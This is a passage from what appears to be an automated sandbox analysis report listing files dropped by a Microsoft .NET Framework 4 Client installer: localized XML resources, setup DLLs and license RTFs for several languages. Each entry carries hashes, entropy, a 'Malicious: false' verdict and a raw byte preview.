                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".A. .t.e.l.e.p...t.Q. .n.e.m. .f.u.t.t.a.t.h.a.t... .k.o.m.p.a.t.i.b.i.l.i.s. ...z.e.m.m...d.b.a.n... .T.o.v...b.b.i. .i.n.f.o.r.m...c.i... .a. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.F.o.n.t.o.s. .f...j.l.b.a.n.&.l.t.;./.A.&.g.t.;. .o.l.v.a.s.h.a.t....."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1038\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18776
                                                                                                                                                                  Entropy (8bit):5.210200964255437
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:mTW68sRjOP2w99bfc/ta4V3mfCHpeEVn3i0MC4wWqyWpLXci2jpv5nNY:m+Aj0R99bfKtHVWfCJeEVn3i0MC44pMQ
                                                                                                                                                                  MD5:C1BF3D63576D619B24837B72986DFAD4
                                                                                                                                                                  SHA1:7392C7B478090831EB2E213BF1224E4F16FDD4D8
                                                                                                                                                                  SHA-256:0995DD70D260673F954DE54FDBA53D55218C536034BE6342E135C7D514073869
                                                                                                                                                                  SHA-512:597F327DF59B0F0CF39FC8753154E55CA8053F489F3FAA5A59C3E7F2115148FE4B49313A94C7CE802AF4B9A1D3FDDF92D3EDC60246E68B17F4CA57CFA3B33397
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................P.......(....@.......................................... ..4+...........2..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1038\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1250, default language ID 1038
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4254
                                                                                                                                                                  Entropy (8bit):5.3269919672171735
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:k8BfeEfTtXeTjXyZD+dtQRzrGJ6JwtxYMpDNeb6CZXKEp5/Eupwy9Ep+LM2:kgffCXPdOzSJ6JwkOBjC0V2
                                                                                                                                                                  MD5:58E6E6D6258994D6A08C6101F11F302D
                                                                                                                                                                  SHA1:DF2DB9DA70204CBB539D17DF860A6C45613EF086
                                                                                                                                                                  SHA-256:70546BABD12AFAF9FFCC437712DF5491DDF9A6AF8AB4F319FC0EA23AFB186726
                                                                                                                                                                  SHA-512:A4A992E2E44C8594E22849C3ED9019C32CF4085E90CC45F0E45A210E68A574A47BF1A06FA405B1F725E1A4DEFBD27E46FE52F3E7A829C8288EC0208BEAC3238B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg1250\deff0\deflang1038\deflangfe1038{\fonttbl{\f0\fswiss\fprq2\fcharset238 Tahoma;}{\f1\froman\fprq2\fcharset238{\*\fname Times New Roman;}Times New Roman CE;}{\f2\fswiss\fprq2\fcharset238 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\b\f0\fs20 KIEG\'c9SZ\'cdT\'d5 LICENCFELT\'c9TELEK MICROSOFT SZOFTVERHEZ\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\f0 MICROSOFT .NET-KERETRENDSZER 4 MICROSOFT WINDOWS OPER\'c1CI\'d3S RENDSZERHEZ\f1\par..\f0 MICROSOFT .NET-KERETRENDSZER 4 \'dcGYF\'c9LPROFIL MICROSOFT WINDOWS OPER\'c1CI\'d3S RENDSZERHEZ\par..\'c9S A KAPCSOL\'d3D\'d3 NYELVI CSOMAGOK\f1\par..\pard\ltrpar\nowidctlpar\sb120\sa120\b0\f0 Ezen kieg\'e9sz\'edt\'e9s licenc\'e9t a Microsoft Corporation (vagy az \'d6n lakhelye alapj\'e1n egy t\'e1rsv\'e1llalata) ny\'fajtja \'d6nnek.\b \b0\'d6n akkor haszn\'e1lhatja ezt a kieg\'e9sz\'edt\'e9st, ha rende

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1040\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (679), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):80060
                                                                                                                                                                  Entropy (8bit):3.556654700353072
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wFACg1fPK/YBZ3tMa9eIzNZNs4fzWmJVo5HnscuRv:/ACgNKjaVLJi2
                                                                                                                                                                  MD5:EDA1EC689D45C7FAA97DA4171B1B7493
                                                                                                                                                                  SHA1:807FE12689C232EBD8364F48744C82CA278EA9E6
                                                                                                                                                                  SHA-256:80FAA30A7592E8278533D3380DCB212E748C190AAEEF62136897E09671059B36
                                                                                                                                                                  SHA-512:8385A5DE4EB6B38169DD1EB03926BC6D4604545801F13D99CEE3ACEDE3D34EC9F9D96B828A23AE6246809DC666E67F77A163979679956297533DA40F9365BF2C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.m.p.o.s.s.i.b.i.l.e. .e.s.e.g.u.i.r.e. .i.l. .p.r.o.g.r.a.m.m.a. .d.i. .i.n.s.t.a.l.l.a.z.i.o.n.e. .i.n. .m.o.d.a.l.i.t... .d.i. .c.o.m.p.a.t.i.b.i.l.i.t..... .P.e.r. .u.l.t.e.r.i.o.r.i. .i.n.f.o.r.m.a.z.i.o.n.i.,. .v.e.d.e.r.e. .i.l. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.f.i.l.e. .R.e.a.d.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1040\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18264
                                                                                                                                                                  Entropy (8bit):5.142702232041524
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:77n6Tg7AtONBKHno5hWXeWFLXci2jpvz2:7XAbs+ZMi2jpvz2
                                                                                                                                                                  MD5:E4860FC5D4C114D5C0781714F3BF041A
                                                                                                                                                                  SHA1:864CE88E8AB1DB9AFF6935F9231521B6B72D5974
                                                                                                                                                                  SHA-256:6B2D479D2D2B238EC1BA9D14F9A68DC552BC05DCBCC9007C7BB8BE66DEFC643B
                                                                                                                                                                  SHA-512:39B0A97C4E83D5CCA1CCCCE494831ADBC18DF1530C02E6A2C13DAE66150F66A7C987A26CECB5587EA71DD530C8BE1E46922FE8C65AE94145D90B0A057C06548D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P......^.....@.......................................... ...)...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1040\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1040
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3643
                                                                                                                                                                  Entropy (8bit):5.117983582325958
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:rwBfYOP/TfVTJDwXtxjCJEZ+jw/Njppm/F/ZaFgcT/okOct2:yfYXRzMjsA9/EFxDt2
                                                                                                                                                                  MD5:6C9C19BFED724146512493F05CBA4F0F
                                                                                                                                                                  SHA1:DE249075AAC70D4661ED559FD64DE9F33DE43DB5
                                                                                                                                                                  SHA-256:C405AB9949C10619742AF1AF153521FFD85C16821324C16233B025F982A98CAD
                                                                                                                                                                  SHA-512:709A522477121EE32152DBE7F90EE4B597621761854B55A791C07C9521FFB899A21C0B84351A68AC3A583B43A91AC5164EF34259D153D21B47C404B4313893B3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\deflang1040\deflangfe1041{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\b\f0\fs20 CONDIZIONI DI LICENZA SOFTWARE MICROSOFT SUPPLEMENTARI\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\f0 MICROSOFT .NET FRAMEWORK 4 PER IL SISTEMA OPERATIVO MICROSOFT WINDOWS\f1\par..\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE PER IL SISTEMA OPERATIVO MICROSOFT WINDOWS\par..E RELATIVI LANGUAGE PACK \f1\par..\pard\ltrpar\nowidctlpar\sb120\sa120\b0\f0 Microsoft Corporation (o, in base al luogo di residenza del licenziatario, una delle sue consociate) concede in licenza al licenziatario il presente supplemento.\b \b0 Qualora il licenziatario sia autorizzato a utilizzare il software per il sistema operativo Microsoft Windows (per il qua

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1041\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (538), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):68226
                                                                                                                                                                  Entropy (8bit):4.416259780276574
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wVzQOXe7GoXHoMIpYnxKJMlvWy0aO8rRnfJGnav:3QOu7GlCnkJMlvWy0aO8rRnfJ5
                                                                                                                                                                  MD5:64FFA6FF8866A15AFF326F11A892BEAD
                                                                                                                                                                  SHA1:378201477564507A481BA06EA1BC0620B6254900
                                                                                                                                                                  SHA-256:7570390094C0A199F37B8F83758D09DD2CECD147132C724A810F9330499E0CBF
                                                                                                                                                                  SHA-512:EA5856617B82D13C9A312CB4F10673DBC4B42D9AC5703AD871E8BDFCC6549E262E61288737AB8EBCF77219D24C0822E7DACF043D1F2D94A97C9B7EC0A5917EF2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."..0.0.0.0.0.0o0.N.c.0.0.0g0.[L.g0M0~0[0.0.0s.0}k0d0D0f0o0.0&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;..0.0.0.0 ..0.0.0&.l.t.;./.A.&.g.t.;..0.SgqW0f0O0`0U0D0.0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. ..0.0.0

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1041\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):15704
                                                                                                                                                                  Entropy (8bit):5.929554826924656
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:Cg0rjUfwtW1+/FuZhS5CSJk/lhAW5kEW1QKPnEtObMacxc8hjeyveCXPX:5hC7mS53JkNSW5kEW1LXci2jpvJ
                                                                                                                                                                  MD5:278FD7595B580A016705D00BE363612F
                                                                                                                                                                  SHA1:89A299A9ABECB624C3606267371B7C07B74B3B26
                                                                                                                                                                  SHA-256:B3ECD3AEA74D0D97539C4971C69F87C4B5FE478FC42A4A31F7E1593D1EBA073F
                                                                                                                                                                  SHA-512:838D23D35D8D042A208E8FA88487CD1C72DA48F336157D03B9549DD55C75DA60A83F6DD2B3107EB3E5A24F3FAD70AE1629ACC563371711117C3C3E299B59D838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!........."...............................................@............@.......................................... ..h............&..X............................................................................................text...G...........................@..@.rsrc.... ... ... ..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1041\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 932, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):10125
                                                                                                                                                                  Entropy (8bit):4.144479793761895
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:tEf13/qC2+PCsANROmuuU8EhZFJEj2VQoKOwyWAOxzpOh+uqaJgt2:tBtQoCnGDzhuqz2
                                                                                                                                                                  MD5:75CE7D721BDB78F1020ACF2B206B1859
                                                                                                                                                                  SHA1:CC0418DE8806811D21B19005BC5DB0092767F340
                                                                                                                                                                  SHA-256:2ABDC7246E95E420B4E66CC3C07ACDB56FF390BCD524E0D8525D5BF345030A5A
                                                                                                                                                                  SHA-512:FAFAC863DC825FC0B104751FE62CDA2C43048683F9D7E45659784206EA67F1AA98EA282AFC2A3A4BA287D03F73B21EC1E2F8C02F5D036CE96CAEFD851A5389E5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg932\deff0\deflang1033\deflangfe1041{\fonttbl{\f0\fmodern\fprq2\fcharset128 \'82\'6c\'82\'72 \'82\'6f\'83\'53\'83\'56\'83\'62\'83\'4e;}{\f1\fswiss\fprq2\fcharset0 Tahoma;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}{\info{\horzdoc}{\*\lchars $(<?[\'5c\'7b\'81\'92\'5c\'81\'e1\'81\'65\'81\'67}{\*\fchars !%'),.:\'3b>?]\'7d\'81\'91\'81\'8b\'81\'45\'81\'e2\'81\'66\'81\'68\'81\'f1}}..\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\lang1041\b\f0\fs20\'83\'7d\'83\'43\'83\'4e\'83\'8d\'83\'5c\'83\'74\'83\'67\lang1033\f1 \lang1041\f0\'83\'5c\'83\'74\'83\'67\'83\'45\'83\'46\'83\'41\'92\'c7\'89\'c1\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\lang1033\f2\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\f1 MICROSOFT WINDOWS \lang1041\f0\'83\'49\'83\'79\'83\'8c\'81\'5b\'83\'65\'83\'42\'83\'93\'83\'4f\lang1033\f1 \lang1041\

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1042\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (509), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):65238
                                                                                                                                                                  Entropy (8bit):4.384411743704147
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wsx1QzSzXLGKgooDQA0pb5ywW4JSUQvEQzH/dv:egtqpb5yw5Jg
                                                                                                                                                                  MD5:78C16DA54542C9ED8FA32FED3EFAF10D
                                                                                                                                                                  SHA1:AD8CFE972C8A418C54230D886E549E00C7E16C40
                                                                                                                                                                  SHA-256:E3E3A2288FF840AB0E7C5E8F7B4CFB1F26E597FB17CFC581B7728116BD739ED1
                                                                                                                                                                  SHA-512:D9D7BB82A1D752A424BF81BE3D86ABEA484ACBB63D35C90A8EE628E14CF34A7E8A02F37D2EA82AA2CE2C9AA4E8416A7A6232C632B7655F2033C4AAAB208C60BF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".8.X. .......... .$.X. ...\.....D. ....`. ... ........ ...8.\. .....@. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;..... ..... ...|.&.l.t.;./.A.&.g.t.;.D. .8.p.X.....$..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1042\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):15192
                                                                                                                                                                  Entropy (8bit):5.9622226182057325
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:Hpix6f+jYxzekdPKNS0N7gVCAMWpCeWRQKPnEtObMacxc8hjeyveCXmo+:3ibMj0lgRMWpCeWRLXci2jpv8o+
                                                                                                                                                                  MD5:FCFD69EC15A6897A940B0435439BF5FC
                                                                                                                                                                  SHA1:6DE41CABDB45294819FC003560F9A2D1E3DB9A7B
                                                                                                                                                                  SHA-256:90F377815E3C81FC9AE5F5B277257B82811417CA3FFEACD73BAB530061B3BE45
                                                                                                                                                                  SHA-512:4DC3580B372CEE1F4C01569BAEA8CD0A92BC613648DB22FF1855920E47387A151964B295A1126597B44BB0C596E8757B1FCF47CDA010F9BBB15A88F97F41B8BF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!......... ...............................................@......v.....@.......................................... ...............$..X............................................................................................text...G...........................@..@.rsrc.... ... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1042\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 949, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):12687
                                                                                                                                                                  Entropy (8bit):4.39170120937692
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:MUf0PVF4MjeKojIfE6wK+b/mIr4tIAcAIce5rD6O1IuonKZim+dfNAW6qUK84Zn+:aK0wB/Tr4TmckIuCm+TAWdUN/re2
                                                                                                                                                                  MD5:A3B318528E286EC387E81934E5D3B081
                                                                                                                                                                  SHA1:CEDCC08D008E21C0E88EEF8354DAB8CFF2EF51AD
                                                                                                                                                                  SHA-256:2954EDB51628942A37A9BF58DA628932638C35ED61744892E42623FE4CCD06A0
                                                                                                                                                                  SHA-512:3544D9BE654C859CDE2B9CD8614C5ABED89E488DFEE2F51AB92A509873DC504942E375388D12379DE9D29DEEDE662667F8CC4BC6D2DCD50C5AC865CE6C44352D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg949\deff0\deflang1033\deflangfe1042{\fonttbl{\f0\fswiss\fprq2\fcharset0 Arial;}{\f1\froman\fprq2\fcharset129 \'b9\'d9\'c5\'c1;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}{\info{\horzdoc}{\*\lchars $(<?[\'5c\'7b\'a1\'cc\'a1\'cd\'a1\'ec\'a1\'ae\'a1\'b0}{\*\fchars !%'),.:\'3b>?]\'7d\'a1\'cb\'a1\'c6\'a1\'ed\'a1\'af\'a1\'b1}}..\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\b\f0\fs28 MICROSOFT \lang1042\f1\'bc\'d2\'c7\'c1\'c6\'ae\'bf\'fe\'be\'ee\lang1033\f0 \lang1042\f1\'c3\'df\'b0\'a1\lang1033\f0 \lang1042\f1\'bb\'e7\'bf\'eb\'b1\'c7\lang1033\f0 \lang1042\f1\'b0\'e8\'be\'e0\'bc\'ad\lang1033\f0\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\fs20 MICROSOFT WINDOWS \lang1042\f1\'bf\'ee\'bf\'b5\lang1033\f0 \lang1042\f1\'c3\'bc\'c1\'a6\'bf\'eb\lang1033\f0 MICROSOFT .NET FRAMEWORK 4\par..MICROSOFT WINDOWS \lang1042\f1\'bf\'ee\'bf\'b5\lang1033\f0 \lang1042\f1\'c3\'bc\'c1\'a6\'bf\'eb\lang1033\f0 MICROSOFT .N

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\1043\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (658), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):79634
                                                                                                                                                                  Entropy (8bit):3.5656146816718155
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wCsfDNzgDbRiRVqxdYRF405vYtyVB1HaAzTGZUeJvuQFKhlQ5gwJBKQauJf1tSY:jbZKbRyVqb82IB+GlQ5gwJBzauJzkA
                                                                                                                                                                  MD5:6506B4E64EBF6121997FA227E762589F
                                                                                                                                                                  SHA1:71BC1478C012D9EC57FC56A5266DD325B7801221
                                                                                                                                                                  SHA-256:415112AE783A87427C2FADD7B010ADE4F1A7C23B27E4B714B7B507C16B572A1C
                                                                                                                                                                  SHA-512:39024EA9D42352F7C1BD6FEFE0574054ECEB4059F773CFAEB26C42FAADA2540AE95FB34718D30CCB6DA157D2597F80D12A024461FBD0E8D510431BA6FFA81EC2
                                                                                                                                                                  Malicious:false
